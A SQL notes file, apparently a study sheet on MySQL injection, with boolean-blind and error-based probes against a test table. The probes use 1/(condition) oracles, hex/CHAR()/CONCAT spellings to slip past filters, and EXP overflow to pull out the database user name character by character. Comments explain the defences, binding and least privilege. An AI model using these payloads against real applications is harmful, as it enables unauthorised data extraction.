sql注入笔记

笔记记录

流程

1.确定sql注入(利用 ' ,and进行逻辑拼接判断注入点)

2.确定注入类型,这里是数值型(name做字符型注入)

3.绕waf(hex或char)

代码

Create Table
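# Scratch fixture for the statements below: two nullable columns, no primary
# key, MyISAM. That is deliberately minimal for a notes file; it is not a
# production schema (no NOT NULL, no key, non-transactional engine).
# The statement terminator was missing, so when this file is run as a script
# the CREATE TABLE fused with the SELECT that follows it; IF NOT EXISTS makes
# re-running the notes harmless.
CREATE TABLE IF NOT EXISTS `test` (
  `id` int(11) DEFAULT NULL,
  `name` varchar(200) DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;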
# Detection probe. Because the value is spliced into the statement as text,
# the appended "OR 1=2" is parsed as SQL; it is always false, so the result
# must equal a plain "id = 1" query (a different result, or an error, is the
# tell). With a bound parameter the whole string "1' OR 1=2" would be compared
# to id as data and the appended clause would never exist.
SELECT * FROM test WHERE id ='1' OR 1=2;# probe

# String context: inside the double-quoted literal the text is inert data, so
# the second statement compares NAME against a literal string and evaluates
# nothing. This is the guarantee parameter binding gives every input, numeric
# or string, without depending on the application quoting correctly.
SELECT * FROM test WHERE NAME="zhangsan";
SELECT * FROM test WHERE NAME="1/(USER() LIKE 'r%')";



# Numeric context: id is compared with an arithmetic expression, so no quote
# is needed and the injected text is evaluated. 1/(pred) is 1 when pred holds
# and 1/0 otherwise -- NULL under MySQL's default sql_mode -- so the query
# returns the id=1 row or nothing. Only row presence leaks, so hiding database
# error text does not close this channel; binding id as an integer does.
SELECT * FROM test WHERE id =1/(USER() LIKE 'r%');
# The statements below are the same predicate in other spellings (hex literal,
# CHAR(), split across lines, CONCAT). A filter keyed on the literal string is
# the wrong layer, which is what the notes mean by "waf bypass"; for detection
# the stronger signal is a hex/CHAR() literal or a function call arriving
# where a plain integer id is expected, independent of any one string.
SELECT * FROM test WHERE id =1/(USER() LIKE 0x7225);
SELECT * FROM test WHERE id =1/(USER() LIKE CHAR(114,37));
SELECT * FROM test WHERE id =1/(USER()
 LIKE
  'r%');
SELECT * FROM test WHERE id =1/(USE/*zhushi*/R() LIKE 'r%');  # did not work (presumably because the comment splits the USER identifier)

SELECT * FROM test WHERE id =1/(USER() LIKE CONCAT('r','%'));

# Same row/no-row oracle with LIKE replaced by string-position functions that
# test the leading character of the connecting account name (the 'r'
# presumably probes for root). Several interchangeable spellings of one check
# show why a function-name deny-list is not a control; what limits what such a
# probe can learn is connecting the application with a least-privilege account
# rather than an administrative one.
SELECT * FROM test WHERE id =1/(INSTR(USER(),'r')=1);


SELECT * FROM test WHERE id =1/(POSITION('r' IN USER())=1);


SELECT * FROM test WHERE id =1/(LOCATE('r',USER())=1);

# Second character, via LOCATE's start offset (CURRENT_USER here instead of
# USER()) and via SUBSTRING; the account name is readable one position at a
# time from any injectable numeric context.
SELECT * FROM test WHERE id =1/(LOCATE('o',CURRENT_USER,2)>0);

SELECT * FROM test WHERE id =1/(SUBSTRING(USER(),2,1)='o');

# Error-based variant. EXP(709) still fits in a DOUBLE while EXP(710)
# overflows, and current MySQL versions report that overflow as an
# out-of-range error rather than returning NULL, so the answer arrives as
# "error vs. row" instead of "row vs. no row". Unlike the row-presence oracle
# above, this channel is closed by not returning database error text to the
# client -- but only this channel; the fix is still binding the value.
SELECT * FROM test WHERE id =1/(1 AND EXP(710-1));	# control case: EXP(709) evaluates cleanly and the row is returned

# The same overflow combined with a character comparison on the account name.
SELECT * FROM test WHERE id =1/(1 AND EXP(710-SUBSTRING(USER(),1,1)='r'));

###